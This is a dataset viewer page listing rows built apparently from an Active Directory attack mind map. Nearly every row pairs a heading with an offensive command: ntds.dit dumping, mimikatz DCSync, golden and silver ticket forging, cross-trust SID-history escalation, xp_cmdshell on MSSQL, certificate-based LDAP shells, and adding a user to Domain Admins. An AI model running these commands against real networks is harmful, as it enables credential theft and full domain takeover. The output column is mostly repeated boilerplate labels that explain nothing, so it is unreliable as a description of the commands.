instruction stringclasses 270
values | input stringlengths 3 214 | output stringclasses 297
values |
|---|---|---|
Socks (relay) | proxychains atexec.py -no-pass <domain>/<user>@<ip> "command" | Note or procedural step under 'Socks (relay)'. |
Socks (relay) | proxychains smbexec.py -no-pass <domain>/<user>@<ip> | Note or procedural step under 'Socks (relay)'. |
Certificate (pfx) | unpac the hash | Note or procedural step under 'Certificate (pfx)'. |
Certificate (pfx) | certipy auth -pfx <crt_file> -dc-ip <dc_ip> | Note or procedural step under 'Certificate (pfx)'. |
Certificate (pfx) | gettgtpkinit.py -cert-pfx <crt.pfx> -pfx-pass <crt_pass> "<domain>/<dc_name>" <tgt.ccache> | Note or procedural step under 'Certificate (pfx)'. |
Certificate (pfx) | getnthash.py -key '<AS-REP encryption key>' '<domain>'/'<dc_name>' | Note or procedural step under 'Certificate (pfx)'. |
Certificate (pfx) | Pass the certificate | Note or procedural step under 'Certificate (pfx)'. |
Certificate (pfx) | pkinit | Note or procedural step under 'Certificate (pfx)'. |
Certificate (pfx) | gettgtpkinit.py -cert-pfx "<pfx_file>" ^[-pfx-pass "<cert-password>"] "<fqdn_domain>/<user>" "<tgt_ccache_file>" | Note or procedural step under 'Certificate (pfx)'. |
Certificate (pfx) | Rubeus.exe asktgt /user:"<username>" /certificate:"<pfx_file>" [/password:"<certificate_password>"] /domain:"<fqdn-domain>" /dc:"<dc>" /show | Tool or command referenced under 'Certificate (pfx)'. |
Certificate (pfx) | certipy auth -pfx <crt_file> -dc-ip <dc_ip> | Note or procedural step under 'Certificate (pfx)'. |
Certificate (pfx) | schannel | Note or procedural step under 'Certificate (pfx)'. |
Certificate (pfx) | certipy auth -pfx <pfx_file> -ldap-shell | Note or procedural step under 'Certificate (pfx)'. |
Certificate (pfx) | add_computer | Note or procedural step under 'Certificate (pfx)'. |
Certificate (pfx) | Set RBCD | Note or procedural step under 'Certificate (pfx)'. |
Certificate (pfx) | certipy cert -pfx "<pfx_file>" -nokey -out "user.crt" | Note or procedural step under 'Certificate (pfx)'. |
Certificate (pfx) | certipy cert -pfx "<pfx_file>" -nocert -out "user.key" | Note or procedural step under 'Certificate (pfx)'. |
Certificate (pfx) | passthecert.py -action ldap-shell -crt <user.crt> -key <user.key> -domain <domain> -dc-ip <dc_ip> | Note or procedural step under 'Certificate (pfx)'. |
MSSQL | find mssql access | Note or procedural step under 'MSSQL'. |
MSSQL | nxc mssql <ip> -u <user> -p <password> -d <domain> | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
MSSQL | Users or Computers with SQL admin | Note or procedural step under 'MSSQL'. |
MSSQL | MATCH p=(u:Base)-[:SQLAdmin]->(c:Computer) RETURN p | Note or procedural step under 'MSSQL'. |
MSSQL | MSSQL | Note or procedural step under 'MSSQL'. |
MSSQL | mssqlclient.py -windows-auth <domain>/<user>:<password>@<ip> | Note or procedural step under 'MSSQL'. |
MSSQL | enum_db | Note or procedural step under 'MSSQL'. |
MSSQL | enable_xp_cmdshell | Note or procedural step under 'MSSQL'. |
MSSQL | xp_cmdshell <cmd> | Note or procedural step under 'MSSQL'. |
MSSQL | enum_impersonate | Note or procedural step under 'MSSQL'. |
MSSQL | exec_as_user <user> | Note or procedural step under 'MSSQL'. |
MSSQL | exec_as_login <login> | Note or procedural step under 'MSSQL'. |
MSSQL | xp_dir_tree <ip> | Note or procedural step under 'MSSQL'. |
MSSQL | COERCE SMB | Note or procedural step under 'MSSQL'. |
MSSQL | trustlink | Note or procedural step under 'MSSQL'. |
MSSQL | sp_linkedservers | Note or procedural step under 'MSSQL'. |
MSSQL | use_link | Note or procedural step under 'MSSQL'. |
Domain Admin | Dump ntds.dit | Note or procedural step under 'Domain Admin'. |
Domain Admin | nxc smb <dcip> -u <user> -p <password> -d <domain> --ntds | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
Domain Admin | secretsdump.py '<domain>/<user>:<pass>'@<ip> | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Domain Admin | ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q | Note or procedural step under 'Domain Admin'. |
Domain Admin | secretsdump.py -ntds ntds_file.dit -system SYSTEM_FILE -hashes lmhash:nthash LOCAL -outputfile ntlm-extract | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Domain Admin | msf> windows/gather/credentials/domain_hashdump | Tool or command referenced under 'Domain Admin'. |
Domain Admin | mimikatz lsadump::dcsync /domain:<target_domain> /user:<target_domain>\administrator | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Domain Admin | certsync -u <user> -p '<password>' -d <domain> -dc-ip <dc_ip> -ns <name_server> | Note or procedural step under 'Domain Admin'. |
Grab backup Keys | donpapi collect - H ':<hash>' <domain>/<user>@<ip_range> -t ALL --fetch-pvk #Credentials | Note or procedural step under 'Grab backup Keys'. |
Enumeration | nltest.exe /trusted_domains | Note or procedural step under 'Enumeration'. |
Enumeration | ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() | Note or procedural step under 'Enumeration'. |
Enumeration | Get-DomainTrust -Domain <domain> | Note or procedural step under 'Enumeration'. |
Enumeration | Get-DomainTrustMapping | Note or procedural step under 'Enumeration'. |
Enumeration | ldeep ldap -u <user> -p <password> -d <domain> -s ldap://<dc_ip> trusts | Note or procedural step under 'Enumeration'. |
Enumeration | sharphound.exe -c trusts -d <domain> | Note or procedural step under 'Enumeration'. |
Enumeration | MATCH p=(:Domain)-[:TrustedBy]->(:Domain) RETURN p | Note or procedural step under 'Enumeration'. |
Enumeration | Get Domains SID | Note or procedural step under 'Enumeration'. |
Enumeration | Get-DomainSID -Domain <domain> Get-DomainSID -Domain <target_domain> | Note or procedural step under 'Enumeration'. |
Enumeration | lookupsid.py -domain-sids <domain>/<user>:<password>'@<dc> 0 lookupsid.py -domain-sids <domain>/<user>:<password>'@<target_dc> 0 | Note or procedural step under 'Enumeration'. |
Child->Parent | Trust Key | Note or procedural step under 'Child->Parent'. |
Child->Parent | mimikatz lsadump::trust /patch | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Child->Parent | mimikatz kerberos::golden /user:Administrator /domain:<domain> /sid:<domain_sid> /aes256:<trust_key_aes256> /sids:<target_domain_sid>-519 /service:krbtgt /target:<target_domain> /ptt | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Child->Parent | secretsdump.py -just-dc-user '<parent_domain>$' <domain>/<user>:<password>@<dc_ip> | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Child->Parent | ticketer.py -nthash <trust_key> -domain-sid <child_sid> -domain <child_domain> -extra-sid <parent_sid>-519 -spn krbtgt/<parent_domain> trustfakeuser | Note or procedural step under 'Child->Parent'. |
Child->Parent | Golden Ticket | Note or procedural step under 'Child->Parent'. |
Child->Parent | mimikatz lsadump::dcsync /domain:<domain> /user:<domain>\krbtgt | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Child->Parent | mimikatz kerberos::golden /user:Administrator /krbtgt:<HASH_KRBTGT> /domain:<domain> /sid:<user_sid> /sids:<RootDomainSID-519> /ptt | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Child->Parent | raiseChild.py <child_domain>/<user>:<password> | Note or procedural step under 'Child->Parent'. |
Child->Parent | ticketer.py -nthash <child_krbtgt_hash> -domain-sid <child_sid> -domain <child_domain> -extra-sid <parent_sid>-519 goldenuser | Note or procedural step under 'Child->Parent'. |
Child->Parent | Unconstrained delegation | Note or procedural step under 'Child->Parent'. |
Child->Parent | coerce parent_dc on child_dc domain #unconstrained delegation | Note or procedural step under 'Child->Parent'. |
Parent->Child | same as Child to parent | Note or procedural step under 'Parent->Child'. |
External Trust | DomainA <--> DomainB trust (B trust A, A trust B) | Note or procedural step under 'External Trust'. |
External Trust | from A to B FOREST_TRANSITIVE | Note or procedural step under 'External Trust'. |
External Trust | password reuse | Note or procedural step under 'External Trust'. |
External Trust | lat move (creds/pth/...) | Note or procedural step under 'External Trust'. |
External Trust | Foreign group and users | Note or procedural step under 'External Trust'. |
External Trust | Users with foreign Domain Group Membership | Note or procedural step under 'External Trust'. |
External Trust | MATCH p=(n:User {domain:"<DOMAIN.FQDN>"})-[:MemberOf]->(m:Group) WHERE m.domain<>n.domain RETURN p | Note or procedural step under 'External Trust'. |
External Trust | Group with foreign Domain Group Membership | Note or procedural step under 'External Trust'. |
External Trust | MATCH p=(n:Group {domain:"<DOMAIN.FQDN>"})-[:MemberOf]->(m:Group) WHERE m.domain<>n.domain RETURN p | Note or procedural step under 'External Trust'. |
External Trust | SID History on B | Note or procedural step under 'External Trust'. |
External Trust | Golden ticket | Note or procedural step under 'External Trust'. |
External Trust | mimikatz lsadump::dcsync /domain:<domain> /user:<domain>\krbtgt | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
External Trust | mimikatz kerberos::golden /user:Administrator /krbtgt:<HASH_KRBTGT> /domain:<domain> /sid:<user_sid> /sids:<RootDomainSID>-<GROUP_SID_SUP_1000> /ptt | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
External Trust | ticketer.py -nthash <krbtgt> -domain-sid <domain_a> -domain <domain_a> -extra-sid <domain_b_sid>-<group_sid sup 1000> fakeuser | Note or procedural step under 'External Trust'. |
External Trust | Trust ticket | Note or procedural step under 'External Trust'. |
External Trust | ADCS abuse | Note or procedural step under 'External Trust'. |
External Trust | Unconstrained delegation | Note or procedural step under 'External Trust'. |
External Trust | coerce dc_b on dc_a #Uncontrained Delegation (ADCS) | Note or procedural step under 'External Trust'. |
External Trust | from A to B is FOREST_TRANSITIVE|TREAT_AS_EXTERNAL | Note or procedural step under 'External Trust'. |
External Trust | DomainA <-- DomainB trust (B trust A / A access B) | Note or procedural step under 'External Trust'. |
External Trust | Same as double trust, but no unconstrained delegation as B can't connect to A | Note or procedural step under 'External Trust'. |
External Trust | DomainA --> DomainB trust (A trust B / B access A) | Note or procedural step under 'External Trust'. |
External Trust | password reuse #lat move (creds/pth/...) | Note or procedural step under 'External Trust'. |
Mssql links | MSSQL trusted links doesn't care of trust link | Note or procedural step under 'Mssql links'. |
Mssql links | Get-SQLServerLinkCrawl -username <user> -password <pass> -Verbose -Instance <sql_instance> | Note or procedural step under 'Mssql links'. |
Mssql links | mssqlclient.py -windows-auth <domain>/<user>:<password>@<ip> | Note or procedural step under 'Mssql links'. |
Mssql links | trustlink | Note or procedural step under 'Mssql links'. |
Mssql links | sp_linkedservers | Note or procedural step under 'Mssql links'. |
Mssql links | use_link | Note or procedural step under 'Mssql links'. |
ADD DA | net group "domain admins" myuser /add /domain | Note or procedural step under 'ADD DA'. |
Golden Ticket | ticketer.py -aesKey <aeskey> -domain-sid <domain_sid> -domain <domain> <anyuser> | Note or procedural step under 'Golden Ticket'. |
Golden Ticket | mimikatz "kerberos::golden /user:<admin_user> /domain:<domain> /sid:<domain-sid>/aes256:<krbtgt_aes256> /ptt" | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Silver Ticket | mimikatz "kerberos::golden /sid:<current_user_sid> /domain:<domain-sid> /target:<target_server> /service:<target_service> /aes256:<computer_aes256_key> /user:<any_user> /ptt" | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.